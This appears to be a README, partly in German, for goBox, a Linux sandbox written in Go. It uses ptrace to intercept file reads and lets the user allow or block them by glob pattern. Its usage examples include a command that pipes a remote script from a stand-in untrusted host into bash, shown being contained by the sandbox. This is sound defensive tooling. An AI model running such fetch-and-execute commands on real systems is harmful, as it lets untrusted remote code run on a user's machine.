
GO-Sandbox zur Ausführung von nicht vertrauenswürdigem Code
GO-Sandbox zum Ausführen von nicht vertrauenswürdigem Code.
goBox verwendet Ptrace, um in READ-Syscalls einzugreifen, und gibt Ihnen die Möglichkeit, Syscalls zu akzeptieren oder abzulehnen, bevor sie ausgeführt werden.
Usage of ./gobox:
gobox [FLAGS] command
flags:
-h Print Usage.
-n value
A glob pattern for automatically blocking file reads.
-y value
A glob pattern for automatically allowing file reads.
> gobox -n "/etc/password.txt" npm install sketchy-module
BLOCKED READ on /etc/password.txt
> gobox -n "/etc/password.txt" bash <(curl https://danger.zone/install.sh)
BLOCKED READ on /etc/password.txt
Sicherlich könnten Sie strace verwenden, aber es referenziert Dateideskriptoren. goBox macht dies auf einen Blick viel einfacher, indem es den absoluten Pfad des fd ausgibt.
> gobox ls
Wanting to READ /usr/lib/x86_64-linux-gnu/libselinux.so.1 [y/n]
HINWEIS: Es ist definitiv eine bessere Idee, alle Ihre sensiblen Daten zu verschlüsseln. goBox sollte wahrscheinlich nur verwendet werden, wenn dies unpraktisch oder undurchführbar ist.
HINWEIS: Ich habe keine Mühen für plattformübergreifende Kompatibilität unternommen, daher funktioniert es derzeit nur unter Linux. Ich würde mich freuen, Patches zur Verbesserung der Portabilität anzunehmen.